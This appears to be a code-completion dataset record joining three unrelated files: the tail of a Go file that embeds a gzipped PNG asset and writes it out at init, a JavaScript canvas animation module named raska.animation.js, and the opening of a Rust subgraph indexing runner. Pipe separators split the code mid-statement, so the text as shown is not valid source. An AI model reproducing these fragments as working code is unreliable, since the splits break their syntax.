8b\xc3\x1b\xed\xdf\xa5\x3f\x35\x3e\xb0\x8b\x97\xd6\x42\xa0\xf3\x4e\x7c\xcc\x1c\x9c\xda\xff\x38\xab\x14\x0a\x32\x17\x7f\x53\x78\x52\x2e\x49\x25\xe9\x6b\x7f\xee\xaa\xd4\xda\xf0\x27\x1a\xf7\x0c\x82\xdc\x71\x4d\xd7\x0d\xb1\x07\x6f\x1d\x48\x70\xe2\xb8\xc3\x6c\xc3\x51\x5f\xa6\x6d\xfa\xe6\x3b\x5d\x51\xb6\xaf\xfa\x1f\x29\xde\x26\xba\x37\xab\xcb\x18\x73\xc4\xa2\x4e\x5f\x44\xcf\xdf\xde\x71\xc1\x5b\xee\xa1\x75\xcb\x47\x5f\x04\xc7\xfa\xe9\x86\xfb\xa3\xd0\x0b\x00\x6f\xf1\x67\x63\xa6\x5f\xa7\x11\x4b\xd0\x3b\x5f\xe3\x27\xa0\x1b\x9a\x3c\x85\xab\x16\x4d\x0b\xb4\x33\xf3\x83\x7e\x4c\xa4\xdf\x58\x89\x88\x49\xec\x0c\x8d\x72\xec\x1d\xc3\x82\xe6\x87\xb9\x29\x05\x7b\xf2\x3d\x65\xff\xcc\x95\x9c\xde\x90\x44\xfa\xb5\x83\xbd\x0f\xb3\xa6\xd6\x27\x3a\x3e\x79\x00\x1e\x56\x50\x77\xa4\xb0\x02\xba\x5d\x21\x73\x6a\xf0\x13\x94\x73\x52\x84\x80\xdd\x04\xa6\x00\x08\x64\x33\x6e\xce\xfa\x57\x82\x22\xf7\x37\x28\x24\xd5\xa9\x92\x52\x56\x5d\x54\x3c\x92\xa5\x9c\x52\xca\x57\x1f\x05\x28\x4b\x48\xf9\xfb\x87\xca\xc5\xab\x04\xac\xc5\x15\x32\x73\x82\x90\x9d\x6c\x82\xb7\x82\xf4\x42\xed\x64\xbf\x57\x11\xa6\x39\xcc\xa5\x8c\x99\xcc\x95\x05\x51\xf5\xf3\x21\x49\xd0\x25\x07\x82\xe3\xdd\x48\x05\xd9\xd0\xb3\x6c\x17\xa0\x7e\x55\x19\x2a\x19\x59\xd9\x39\xc5\x85\x15\x2d\x19\x95\x6d\x46\xd4\x36\xea\xd4\xba\x09\xf5\x51\x35\x05\x62\x07\xf5\xb7\x95\x11\x5e\x73\x4d\x7f\x43\x3c\x63\x37\xb1\xd7\x1e\xfd\x08\x86\x23\x15\xd7\x61\x57\x2a\xc1\x01\xef\x88\x01\xf6\xfd\x66\x03\xb3\x5f\x90\xba\x5a\xba\xc5\x39\x84\x5f\x5b\x0e\xcc\x12\xbb\x17\x13\x8e\xc4\x2a\x3a\xb3\x42\x71\xca\x34\x5e\xc5\xf7\x7f\x0c\x7d\x58\x52\xfa\xc3\x56\x03\x34\xea\x8e\x5a\x00\x22\x1e\x45\x8c\x47\x6a\x22\x72\x8a\x62\x17\xd6\x39\xe1\xe7\x4e\x93\xac\x88\x17\xf4\xfd\x76\x5e\x13\xd5\xc2\xa2\x7d\xcf\x51\xf7\xe1\x33\xd2\x4b\x3d\x88\x25\xcb\x22\xb1\x9b\xc7\x4a\x97\x62\x56\x73\x62\x56\xb5\xb3\x49\x52\x62\x50\xe1\x23\x1e\xa7\xc1\xb4\x22\x8d\x13\x1d\x32\xea\xad\x5f\x96\xa0\x1a\x1f\x6b\x73\x71\x81\x78\x61\xf5\xa9\xfa\x96\xab\xb5\x76\xa9\xd0\x49\xce\x2d\x0e\xb1\x25\x9f\x9e\xfe\x6e\xbe\x73\xce\x77\xaa\xd0\xa2\x70\x2a\xf2\xd1\x7f\x24\xfb\xcd\x9b\xc9\xe9\x12\xd8\x3e\x1a\xc0\x18\x6b\x6b\x3c\x7d\x39\x5f\x30\x68\xd3\x27\xc5\x91\xff\x48\xee\x64\xf2\xf0\x3e\x45\xc1\x6a\xb5\x85\x43\x49\xa5\x3e\x5a\xbc\x85\x1d\xbe\xa7\xae\x69\xda\xed\xb6\x6b\x74\xdf\x8b\x1c\x62\x6d\x25\xf4\x8a\xa5\x0e\x7a\x1b\x31\x35\x05\x55\x71\xd4\xca\xba\xad\xfc\xf4\xd1\x2f\x8d\xa2\x70\x2f\xf2\xdc\x98\x55\xa8\x84\x78\x1f\x26\x1a\x5f\xfa\x69\x70\x72\xa4\xab\x8f\x4d\x86\x01\xe1\xd9\xeb\xfb\xff\xb9\x77\x71\x6c\x56\xf4\x20\x40\x4e\xb5\xcd\x4d\x4b\xfa\xba\x86\x6e\x3b\x79\x27\x91\xe6\x7d\xd4\x52\x45\x8a\xa6\x48\xd0\x77\xee\x9e\x97\xc5\x42\x4c\xf5\x99\xe0\x1d\xc3\xdc\x6b\x33\x8c\x75\x0a\xc9\x7e\xb5\x09\xd6\xc6\xc6\x0b\xb0\x25\xef\xad\x78\x12\x13\xf7\x53\x47\x38\x75\x36\x95\x87\x9b\x1e\x45\xad\xa8\x72\x10\x8e\x07\xd0\xf2\x78\xc3\x44\xe0\x06\xcb\xc2\x92\x29\xeb\x03\xd3\x0d\x0a\x53\xf6\x4c\x08\x61\xeb\xc1\xab\x79\xdf\x85\x70\x02\xe0\xf2\x36\x48\x8c\xb3\xcb\xcf\xc3\xfe\xc3\x40\xa6\x07\x81\x82\xb3\xa9\x65\x62\x45\x3d\x67\x85\x75\xda\x91\xfa\xb0\x01\x1c\x81\x72\xbc\x04\xdc\x6c\x50\xa3\xeb\xae\x0c\x36\xef\xd3\x45\x38\x3e\x68\xca\xd5\xec\xe6\x86\xcd\x21\xbd\xcf\xcf\x38\xdf\x1e\x80\x44\x53\x90\x52\xe4\xdb\x5d\xab\x4b\xe8\x0e\xf2\xd7\xa0\x6d\xc4\x22\xa6\x3e\xc9\xa1\x75\x1b\x6d\xdb\x42\x1a\xdd\x06\xd5\x3a\xce\xad\xee\xa7\xbd\x33\xb6\xbc\x8c\xa7\xcc\x0f\xe6\xf2\x9f\x53\xa8\xb6\x11\x61\x1f\x3b\x5d\x0e\x13\x0a\x99\x11\x41\x89\x53\x1b\x1b\xc3\x27\xf0\xd2\x1a\x44\xf7\x2e\xbe\x73\xd4\x30\xf4\x80\xe2\x7a\xc7\xe6\x7b\xf6\x22\x9f\x16\xf6\x44\xb0\x38\x84\xd1\xbc\xde\xc5\x98\x04\xa7\x15\x74\x06\x8e\xec\x97\x83\x7a\xbc\x70\x2f\xa1\xfe\x84\xae\xe3\x2d\x79\x62\xbd\xa5\x57\xe9\x6c\xd4\x4a\xd5\x42\x9a\x5d\xda\xb7\x5e\xf5\x46\xa7\x2b\x28\xf4\x5e\x89\xb3\xfd\x97\x36\x92\x59\xf6\xc2\x70\x9c\xc6\xb7\x52\x86\xfc\x28\x29\x99\x9d\x60\x97\x11\x9a\x9d\x45\xe7\xe4\xd6\x03\xf4\x7b\xb2\xd5\xa9\xeb\xa7\x4e\x09\x29\x1e\xbd\x32\x16\xc6\x59\xbe\x18\x0f\x47\x55\xbd\x7b\xfd\xd0\xfa\x1a\x88\x6f\xf8\xf5\xb8\xf6\x5e\x45\x78\x78\xbd\x56\x88\x27\x8f\xb9\x83\xda\xe1\x47\xc8\xf2\x03\x78\x25\x9a\x65\xf4\x42\x69\x1d\x76\xe2\x3c\x10\x6f\x76\x74\x21\xea\x72\x12\x39\xfc\x09\x20\x18\x9b\x2b\x93\x30\x11\x32\x98\xc7\x4a\xa8\x59\x8a\x1f\x83\x53\xe6\x97\x18\x8a\xe1\xeb\x35\xed\x87\x1f\x1d\xaf\xb5\xea\x98\xea\x4e\xe1\xc3\xee\x36\xf4\x00\x5e\xb7\xbd\xd4\x08\x53\xd0\xab\xe1\xff\xf8\xc0\x59\x85\xa1\xf2\x71\xb9\xf6\x1a\x3c\x70\xd4\x3e\xac\xc0\xf4\x75\xfa\x61\xec\xc4\x48\xe0\xe2\x36\x7b\xd4\x44\xe0\xa6\xd2\xcd\xa1\x61\x2a\xf9\x75\x73\xb7\xde\x8a\xa0\xea\x57\xa5\x5f\x74\x49\x94\xf7\x84\xb3\xe4\x96\x33\xf0\xec\xed\xdd\x56\x04\x2f\x38\x9c\x7c\x76\x96\x33\xbb\x40\x63\x6e\xad\x7e\x0c\xa7\xa6\x19\xf6\x48\xc5\x0e\xb8\x63\x6c\x54\x12\x02\x0e\xa6\x76\xcd\x45\x62\x89\x9d\x09\x69\xcc\x6c\xa2\xa6\xa7\xc8\x03\xda\x18\x15\xe7\x91\x2a\x18\xe3\x78\xbf\xe6\x8d\x15\x97\xf1\xf4\x97\x55\xa5\x0c\x05\xaf\x83\x3d\x75\x87\x58\xa1\xe4\x91\x6f\x22\xd6\x66\xde\x04\xf9\x52\x0b\x77\xcc\x87\x5a\x47\x53\xbd\x18\xd3\xdd\x9e\x07\xc6\x91\x34\x7e\xfd\x73\xad\x23\xb4\x98\x3d\x1f\x03\x28\x60\x68\x65\x27\xfb\xe1\x68\x18\x82\xcd\x82\xfd\x38\x7b\xc0\xb2\x31\x67\x75\xe8\xad\xfd\x10\x16\x0a\x4b\x15\xf1\x89\x6b\x2c\xfa\x80\x5e\xdf\x55\xe2\x19\x9a\x6c\x3d\x62\x6d\x5c\x7d\xf1\x15\xe9\x53\x65\x73\x75\x4c\x8a\x08\xfa\x62\xf0\x04\x91\xa7\x39\x96\x7f\xe6\xb1\xd7\xa3\xd4\x14\xf6\x7c\x1b\x1b\x64\x32\x7b\xd2\xa0\x4d\xf6\xdf\xd1\x67\xa2\xd4\x30\x8c\x07\x2a\xdd\xce\x13\xa6\x8e\xfb\x15\x96\x99\x3b\x8d\x30\xa4\xcc\x9e\x10\x77\x8e\xfc\xc7\x5a\x37\x20\x78\xe5\x54\xa3\x4f\x22\xa9\x1f\xe1\x05\x03\x16\x2f\x6a\x59\xbf\xa9\xa1\x80\xbc\xcd\x68\xb5\x2a\x90\xd5\x4b\xcd\xc1\xb7\x71\xd6\x55\xdd\xb6\xa6\x7b\x83\xc2\x9a\xff\xbd\xf0\xfe\xb9\x47\x32\xf5\x54\xf6\xdd\x56\x57\xe7\xda\xc8\xba\x16\x53\x37\xf8\xa6\x18\x50\x7c\x97\x73\x18\xec\xbd\x3a\x0d\x16\xdd\xa8\x6f\x25\xc2\x62\x09\x25\x7f\x0f\x8e\xd8\xca\x37\x64\xb9\xdf\xaf\x5e\x35\x62\xf8\x10\x40\xf1\x93\x53\x3f\x67\x9a\x24\x28\x65\x2f\xe4\xc3\xc3\xf3\x80\xa4\x54\xeb\xb9\x9b\xdd\xdd\x2d\x62\x38\x49\x66\xce\x13\x15\x70\xdc\x3b\x5b\xf4\xce\x8e\x36\x00\x73\x6f\x51\xe4\xdd\x2e\xf9\x3d\x1a\x94\x38\x25\xae\xba\x96\x24\x0f\x88\x09\x93\x49\xb1\x65\xbc\x89\x15\x81\x59\x2e\x75\xd4\xbc\x7f\x3f\xbd\x86\x60\x7a\xea\x6a\x0e\x7f\x1d\xe0\x3c\x6c\xca\xf5\xe1\xc8\x1f\xec\x99\x35\x4d\xbe\xd2\x8a\x30\x11\x28\x83\x4e\x32\xc4\x6b\x0d\xf3\x6d\x85\x63\xed\xb5\x6b\x29\x4e\x86\x5b\xb0\x98\x1f\xaf\xa5\xd0\xbb\x57\xc5\x00\x44\x8b\x1d\x06\x34\x79\x88\x0d\x13\x7b\xdd\xed\xca\xb4\x10\x96\x9b\xc4\x12\xc9\xf5\x1a\x73\x8b\xeb\x4a\x6a\x88\x2e\xd1\xc2\x50\x1f\xa2\x1b\x4b\x96\xd2\xab\x7a\x01\xaf\x2e\x22\xdf\x7f\x93\x07\x6e\x62\xbc\x10\xd6\xd4\x3d\x1b\xa9\x2c\x4a\xab\x63\x34\x31\xe9\x1a\xc3\xc8\xb1\xa5\x5a\x37\x3d\x7e\x2c\x77\x89\x69\x7d\x02\x88\xa2\xf9\xdb\xaf\xa0\xb3\x08\xfb\xe3\xbc\x16\xf2\xf1\x32\x63\x9b\xc5\xc3\x48\xab\x4c\xf3\xfb\x8f\x30\x26\x10\x6b\x30\xb4\xfd\x6f\x88\xef\xbf\x89\x4d\xf2\xfd\x94\xfd\x26\x3e\x14\xfa\xe2\x22\xe9\x04\xb9\xfb\x58\xb5\x7f\x44\x2e\xbe\xed\xc2\x40\xf8\xa2\xc4\x40\x58\xb0\x9e\xe0\x3a\xf8\x09\xe0\x4f\x4b\x57\x4c\xb2\x44\x76\x4d\x23\xed\x8a\xb1\x9a\xb0\x93\x95\xc2\xf2\x0d\x7b\x2b\xa6\xb8\xbc\x73\x28\xad\x7b\xe8\x88\x72\xbb\x32\xb2\xb8\x80\x54\x23\xfc\x4c\x83\x42\xe0\x93\x70\x04\x95\x12\x23\x1e\x48\x9b\xc0\xfa\x32\xfb\x59\x0c\xd7\x53\x08\xfd\xe5\x57\x85\x63\x93\x43\x02\xe0\x1c\xbd\xa7\xea\x3f\x63\x75\xb7\xd1\x81\x00\xd2\x65\x49\xba\xef\x00\x97\xe0\x73\xf0\x68\xd3\x50\xf2\x57\x7b\x8a\xf3\x12\x12\x04\x5c\x01\x59\x12\x7e\x0a\x8d\x3c\x43\x54\xa6\x2a\x1a\x94\x35\x2f\x56\xd4\xf8\x91\xaf\xc6\x31\xa2\x44\x87\x9a\x5a\xc6\x46\xef\x08\x35\xa8\x12\xff\x3c\xa4\xba\x67\xe1\x73\x6b\x91\xb5\x0e\x20\x22\xd0\xbb\x11\x33\xf0\x3b\x1a\x2d\x62\x03\xaf\x01\x5b\xd6\xd9\x70\xf5\x08\x67\x89\x46\xd6\x86\xe0\xf6\x33\x54\x16\xeb\xdb\x6b\x70\x95\xe1\x8f\xfc\xc7\xcd\x39\xc0\x3b\xd6\xb2\x67\xfb\xd7\x49\x47\x01\xa7\xd9\xa1\xd5\xd1\x45\x15\x7b\x51\x1a\x0a\x46\x44\x5a\x93\x3e\x17\xdf\xe0\x8e\x78\x99\x22\x4f\x60\x24\x1e\xd6\x83\xd2\x58\x29\xb9\x13\xfd\x7c\xb7\xd6\x5e\x4b\xbd\x2f\xa9\x2a\xd9\x83\x6e\x37\xa8\x9a\x3d\x83\xe5\x1a\xf5\xc3\x2f\xa4\x95\xea\xbf\x02\x10\xb5\xc3\x8f\xb3\x2f\x5e\x8e\x44\xbe\xb8\x93\x73\xbf\xdb\xd0\xcd\x93\xdb\x91\x2e\x6f\x02\x7b\x77\xd2\x6c\xd4\xdc\x4a\x69\x11\x1b\x40\x27\xb7\x7f\x5b\x37\x62\x8b\x15\xf8\xa7\xa6\x4d\x87\xf7\x9e\x57\xf9\xf1\x94\x14\x87\xbd\x90\xe4\x01\x31\x10\x84\x76\xf9\x7b\x65\x30\xc1\x4a\x12\xfa\x8b\x9f\x10\x29\x7a\x2a\xc3\x9e\xd7\x8d\x1c\x20\x46\x54\x0b\x39\x4c\x23\x10\xb1\xc8\x43\x6f\x08\x01\x0f\xb0\xd3\x46\x10\xe9\xef\x79\xe7\xb9\x76\x56\x14\xb1\x75\x86\x65\x6f\x85\x8f\xfd\x1d\x80\xde\x9e\x8e\x1e\x82\xbd\x1c\xfe\x73\x2b\x86\x09\x06\x29\x91\xa2\xa5\xbc\x57\xcd\xae\x43\x8f\xf0\x10\x4d\x18\xd8\xab\x67\x6a\x20\xc3\x7b\xc8\xf4\x11\x63\xb1\xb5\xc4\x03\xec\x60\x13\x47\x16\xac\xf3\xe3\x01\x76\x66\x09\x23\x5b\xd3\xf3\x50\xfe\xa7\x08\x23\x39\x4e\x69\xb1\xa5\x91\xa5\x3a\x86\xe5\x06\x10\x8a\x00\x66\x69\xa2\xbe\xf6\xdc\xb0\x3f\xa9\x96\xa4\xeb\xfe\x5b\xa1\x5e\xf6\xed\x4c\x1a\x8e\x61\x87\x9e\xdb\x54\x03\x40\x04\x78\xa9\xdf\x5a\x28\xea\x03\xff\xf0\x6d\xcb\x7e\x2f\xa4\xe8\x8f\x4e\x35\xfb\xff\xd3\xcf\x7d\xb3\x8c\x1f\x7c\x3c\xfd\xb6\x6c\xb6\xdf\x72\xe5\xf7\x37\xcc\x9e\xe5\xd6\xff\xae\x9e\x39\x7f\x1e\xd7\x43\x0b\xc3\x03\x97\x4c\xd6\x7e\x59\xc8\xff\x3f\xf2\xfb\x41\x76\xf9\x49\xb3\x37\xf7\x72\xb6\x3a\xbd\xd8\xb5\x6f\x2f\xab\x83\x00\xcb\x49\x46\x8e\x26\x05\x26\x05\x8e\x26\x8e\x06\x05\x0e\x25\x86\x26\x85\x0e\x06\x1a\x09\xd0\xdc\x02\x0a\x04\xa8\x69\xde\xa1\xb5\x4f\xeb\x99\x5f\x36\x88\x54\xbc\xac\xbc\x60\xc3\xc0\xc0\xc0\xe0\xe9\xea\xe7\xb2\xce\x29\xa1\x09\x10\x00\x00\xff\xff\x8d\xce\xf3\xdb\xf3\x42\x00\x00")
func init() | {
rb := bytes.NewReader(FileAssetsOpenstackOperationsOptimizationCongressPng)
r, err := gzip.NewReader(rb)
if err != nil {
panic(err)
}
err = r.Close()
if err != nil {
panic(err)
}
f, err := FS.OpenFile(CTX, "assets/openstack/operations/optimization/congress.png", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0777)
if err != nil {
panic(err)
}
_, err = io.Copy(f, r)
if err != nil {
panic(err)
}
err = f.Close()
if err != nil {
panic(err)
}
} |
|
raska.animation.js | /// <reference path="raska.js" />
/**
* HTML5 canvas visual directed graph creation tool
*
* @module raska
* @submodule animation
* @main installUsing
*/
(function (w) {
'use strict';
if (typeof w.raska === 'undefined') { throw { message: "Raska was not found!" }; }
var $ = raska.$$.$q,
_helpers = raska.$$.$h,
_activeConfiguration = raska.$$.$c,
exceptions = {
invalidElement: function () {
this.message = "Invalid element";
this.code = "AN0";
}
},
tooling = (function () {
w.requestAnimationFrame = function () {
var _timer = null;
return w.requestAnimationFrame || w.webkitRequestAnimationFrame ||
w.mozRequestAnimationFrame || w.msRequestAnimationFrame ||
w.oRequestAnimationFrame || function (f) {
if (_timer !== null) {
w.clearTimeout(_timer);
}
_timer = w.setTimeout(f, _activeConfiguration.frameRefreshRate);
}
}();
return {
/**
* Executes a given delegate whenever possible
*
* @method execute
* @param {Function} what The delegate whe want to execute
* @static
*/
execute: function (what) {
w.requestAnimationFrame(what);
}
};
})();
w.raska.baseAnimation = {
/**
* Handles the periodic draw of the elements in this Raska instance
*
* @method animate
* @chainable
* @static
*/
execute: function (then) { _helpers.$log.info("nope", element); return this; },
/**
* Resets changed element attributes to the default value
*
* @method resetElement
* @chainable
* @static
*/
resetElement: function () { return this; },
/**
* Stops the current animation
*
* @method stop
* @chainable
* @static
*/
stop: function () { return this; }
};
/**
* Controller for the animation routines
*
* @class AnimationChainController
* @constructor
*/
var AnimationChainController = function () {
var _this,
_animations = [],
_animationsCopy = [],
_saveStates = false,
_timer = null,
_loopTimer = null,
_inLoop = false,
_looperInterval = null,
_this = {
/**
* Registers a given animation object to be called
*
* @method register
* @param {raska.baseAnimation} animation Animation spec instance
* @chainable
* @static
*/
register: function (animation) {
if (_animations.indexOf(animation) === -1) {
_animations.push(animation);
if (_saveStates === true) {
_animationsCopy.push(animation);
}
}
return _this;
},
/**
* Clears all saved states from the chain
*
* @method stop
* @chainable
* @static
*/
stop: function () {
_inLoop = false;
if (_loopTimer !== null) { w.clearTimeout(_loopTimer); }
_helpers.$obj.forEach(_animations, function (i, ind) { i.stop(); });
_animations.length = 0;
_helpers.$obj.forEach(_animationsCopy, function (i, ind) { i.stop(); });
_animationsCopy.length = 0;
if (_timer !== null) {
window.clearTimeout(_timer);
_timer = null;
}
return _this;
},
/**
* Saves the initial states for all animations handled by this chain
*
* @method saveStates
* @chainable
* @static
*/
saveStates: function () {
_saveStates = true;
return _this;
},
/**
* Restores the animations from its initial saved state
*
* @method restoreFromSavedState
* @chainable
* @static
*/
restoreFromSavedState: function () {
if (_animations.length === 0 && _animationsCopy.length > 0) {
for (var i = 0; i < (_animations = _animationsCopy.slice()).length; i++) {
_animations[i].resetElement();
}
}
return _this;
},
/**
* Executes a destructive navigation/execution on all registered animations in this chain
*
* @method execute
* @param {Function} then What to do after all animations are done
* @param {number} interval Interval between animations
* @chainable
* @static
*/
execute: function (then, interval) {
if (_animations.length > 0) {
_animations.shift().execute(function () {
if (_helpers.$obj.isType(interval, "number") === true) {
if (_timer !== null) { window.clearTimeout(_timer); }
_timer = window.setTimeout(function () {
_this.execute(then, interval);
}, interval);
} else {
tooling.execute(function () { _this.execute(then); });
}
});
} else {
if (_helpers.$obj.isType(then, "function")) {
then();
}
}
return _this;
},
/**
* Executes all current animations in loop
*
* @method execute
* @param {Function} then What to do after all animations are done
* @param {number} interval Interval between animations
* @chainable
* @static
*/
loop: function (interval) {
if (_inLoop === false) {
_inLoop = true;
_animationsCopy = _animations.slice();
}
_looperInterval = interval;
_looper();
}
},
/**
* Controls the execution of the animation loop
*
* @method _looper
* @private
* @static
*/
_looper = function () {
if (_loopTimer !== null) {
window.clearTimeout(_loopTimer);
_loopTimer = null;
}
if (_inLoop === true) {
_this.restoreFromSavedState();
_this.execute(function () {
if (_inLoop === true) {
if (_helpers.$obj.isType(_looperInterval, "number") === true) {
if (_loopTimer !== null) {
window.clearTimeout(_loopTimer);
}
_loopTimer = w.setTimeout(_looper, _looperInterval);
} else {
tooling.execute(_looper);
}
}
});
}
};
return _this;
},
/**
* The public interface for the animation controller module
*
* @class PublicControllerInterface
* @param {_basicElement} targetElement The element we want to animate
* @constructor
*/
PublicControllerInterface = function (targetElement, _animationChainController) {
var _defaultStep = 1,
_thisPublicControllerInterface = {
/**
* Executes a fadein effect on a given element
*
* @method fadeInWithBoudaries
* @for PublicControllerInterface
* @param {object} maxValues The values for maxHeight and maxWidth
* @static
* @chainable
*/
fadeInWithBoudaries: function (maxValues) {
if (!_helpers.$obj.isValid(maxValues)) {
throw new exceptions.invalidElement();
}
return _thisPublicControllerInterface.fadeIn(_defaultStep, maxValues);
},
/**
* Executes a fadein effect on a given element
*
* @method fadeIn
* @for PublicControllerInterface
* @param {number} stepIncrement The speed the animation executes
* @param {object} maxValues The values for maxHeight and maxWidth
* @static
* @chainable
*/
fadeIn: function (stepIncrement, maxValues) {
if (!_helpers.$obj.isValid(targetElement)) {
throw new exceptions.invalidElement();
}
var _stoped = true,
_maxValues = maxValues || {},
_stepIncrement = stepIncrement || _defaultStep,
_fadeIn = function (changer, then) {
var maxH = _maxValues.maxHeight || targetElement.getHeight(),
maxW = _maxValues.maxWidth || targetElement.getWidth(),
currentH = 0,
currentW = 0,
changed = false,
fader = function () {
if (_stoped === true) {
return;
}
changed = false;
if ((currentH = targetElement.getHeight()) < maxH) {
targetElement.setHeight(Math.min(changer(currentH), maxH));
changed = true;
}
if ((currentW = targetElement.getWidth()) < maxW) {
targetElement.setWidth(Math.min(changer(currentW), maxW));
changed = true;
}
if (changed === true) {
tooling.execute(fader);
} else if (_helpers.$obj.isType(then, "function") === true) {
then();
}
};
targetElement.setWidth(0).setHeight(0);
tooling.execute(fader);
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
var initialW = targetElement.getWidth(),
initialH = targetElement.getHeight();
return {
step: _stepIncrement,
resetElement: function () {
targetElement.setWidth(initialW).setHeight(initialH);
return this;
},
execute: function (then) {
_stoped = false;
_fadeIn(function (x) { return x + _this.step; }, then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
_animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* Executes a fadeOut effect on a given element
*
* @method fadeIn
* @for PublicControllerInterface
* @param {number} stepIncrement The speed the animation executes
* @static
* @chainable
*/
fadeOut: function (stepIncrement) {
if (!_helpers.$obj.isValid(targetElement)) {
throw new exceptions.invalidElement();
}
var _stoped = true,
_stepIncrement = stepIncrement || _defaultStep,
_fadeOut = function (changer, then) {
var minH = 0,
minW = 0,
currentH = targetElement.getHeight(),
currentW = targetElement.getWidth(),
changed = false,
fader = function () {
if (_stoped === true) {
return;
}
changed = false;
if ((currentH = targetElement.getHeight()) > minH) {
targetElement.setHeight(Math.max(changer(currentH), minH));
changed = true;
}
if ((currentW = targetElement.getWidth()) > minW) {
targetElement.setWidth(Math.max(changer(currentW), minW));
changed = true;
}
if (changed === true) {
tooling.execute(fader);
} else if (_helpers.$obj.isType(then, "function") === true) {
then();
}
};
tooling.execute(fader);
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
var initialW = targetElement.getWidth(),
initialH = targetElement.getHeight();
return {
step: _stepIncrement,
resetElement: function () {
targetElement.setWidth(initialW).setHeight(initialH);
return _this;
},
execute: function (then) {
_stoped = false;
_fadeOut(function (x) { return x - _this.step; }, then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
| _animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* Moves a given element around (within canvas' boundaries)
*
* @method move
* @for PublicControllerInterface
* @param {Function} configuration How to move the element around
* @static
* @chainable
*/
move: function (configuration) {
if ((!_helpers.$obj.isValid(targetElement)) || (!_helpers.$obj.isType(configuration, "function"))) {
throw new exceptions.invalidElement();
}
var _stoped = true,
parent = targetElement.getParent(),
boundaries = (parent === null) ? raska.getCanvasBoundaries() : {
maxW: parent.getWidth(),
maxH: parent.getHeight()
},
_move = function (then) {
if (_stoped === true) {
return;
}
var newPosition = configuration(targetElement.x, targetElement.y);
if (newPosition.x >= boundaries.maxW) {
newPosition.x = 0;
}
if (newPosition.y >= boundaries.maxH) {
newPosition.y = 0;
}
targetElement.x = newPosition.x;
targetElement.y = newPosition.y;
if (_helpers.$obj.isType(then, "function") === true) {
tooling.execute(then);
}
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
return {
resetElement: function () { return _this; },
execute: function (then) {
_stoped = false;
_move(then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
_animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* A simple fluent helper to assist in the construct of a better coding
* when animating elements
*
* @method then
* @for PublicControllerInterface
* @static
* @chainable
*/
then: function (what) {
if (_helpers.$obj.isType(what, "object") && _helpers.$obj.isType(what.execute, "function")) {
_animationChainController.register(_helpers.$obj.extend(w.raska.baseAnimation,
(function () {
var _this = {
resetElement: function () { return _this; },
execute: function (then) {
if (what.execute()) {
then();
}
return _this;
}
};
return _this;
})(), true));
}
return _thisPublicControllerInterface;
},
/**
* Executes the current chain of animations
*
* @method execute
* @for PublicControllerInterface
* @static
* @chainable
*/
execute: function (interval) {
_animationChainController.execute(null, interval);
return _thisPublicControllerInterface;
},
/**
* Executes the current chain of animations (in loop)
*
* @method loop
* @for PublicControllerInterface
* @param {number} interval The interval between executions of each animation
* @static
* @chainable
*/
loop: function (interval) {
_animationChainController.loop(interval);
return _thisPublicControllerInterface;
},
/**
* Enables the feature of saving the initial state for each animations
*
* @method saveInitialStates
* @for PublicControllerInterface
* @static
* @chainable
*/
saveInitialStates: function () {
_animationChainController.saveStates();
return _thisPublicControllerInterface;
},
/**
* Stops any active loop animation and clear all saved states up until this point
*
* @method stop
* @for PublicControllerInterface
* @static
* @chainable
*/
stop: function () {
_animationChainController.stop();
return _thisPublicControllerInterface;
}
};
return _thisPublicControllerInterface;
},
_public = (function () {
var _controllers = [],
_thisPublic = {
on: function (element) {
var controllerInstance = new PublicControllerInterface(element, new AnimationChainController());
_controllers.push(controllerInstance);
return controllerInstance;
},
stopAll: function () {
_helpers.$obj.forEach(_controllers, function (e) { e.stop(); });
return _thisPublic;
}
};
return _thisPublic;
})();
w.raska.animation = _public;
})(window); | |
runner.rs | use crate::subgraph::context::IndexingContext;
use crate::subgraph::error::BlockProcessingError;
use crate::subgraph::inputs::IndexingInputs;
use crate::subgraph::metrics::SubgraphInstanceMetrics;
use crate::subgraph::SubgraphInstance;
use atomic_refcell::AtomicRefCell;
use fail::fail_point;
use graph::blockchain::block_stream::{
BlockStream, BlockStreamEvent, BlockStreamMetrics, BlockWithTriggers, BufferedBlockStream,
};
use graph::blockchain::{Block, Blockchain, DataSource, TriggerFilter as _, TriggersAdapter};
use graph::components::{
store::{ModificationsAndCache, SubgraphFork},
subgraph::{CausalityRegion, MappingError, ProofOfIndexing, SharedProofOfIndexing},
};
use graph::data::store::scalar::Bytes;
use graph::data::subgraph::{
schema::{SubgraphError, SubgraphHealth, POI_OBJECT},
SubgraphFeature,
};
use graph::prelude::*;
use graph::util::{backoff::ExponentialBackoff, lfu_cache::LfuCache};
use lazy_static::lazy_static;
use std::convert::TryFrom;
use std::sync::Arc;
use std::time::{Duration, Instant};
const MINUTE: Duration = Duration::from_secs(60);
const SKIP_PTR_UPDATES_THRESHOLD: Duration = Duration::from_secs(60 * 5);
const BUFFERED_BLOCK_STREAM_SIZE: usize = 100;
const BUFFERED_FIREHOSE_STREAM_SIZE: usize = 1;
lazy_static! {
// Keep deterministic errors non-fatal even if the subgraph is pending.
// Used for testing Graph Node itself.
pub static ref DISABLE_FAIL_FAST: bool =
std::env::var("GRAPH_DISABLE_FAIL_FAST").is_ok();
/// Ceiling for the backoff retry of non-deterministic errors, in seconds.
pub static ref SUBGRAPH_ERROR_RETRY_CEIL_SECS: Duration =
std::env::var("GRAPH_SUBGRAPH_ERROR_RETRY_CEIL_SECS")
.unwrap_or((MINUTE * 30).as_secs().to_string())
.parse::<u64>()
.map(Duration::from_secs)
.expect("invalid GRAPH_SUBGRAPH_ERROR_RETRY_CEIL_SECS");
}
async fn new_block_stream<C: Blockchain>(
inputs: Arc<IndexingInputs<C>>,
filter: C::TriggerFilter,
block_stream_metrics: Arc<BlockStreamMetrics>,
) -> Result<Box<dyn BlockStream<C>>, Error> {
let chain = inputs.chain.cheap_clone();
let is_firehose = chain.is_firehose_supported();
let buffer_size = match is_firehose {
true => BUFFERED_FIREHOSE_STREAM_SIZE,
false => BUFFERED_BLOCK_STREAM_SIZE,
};
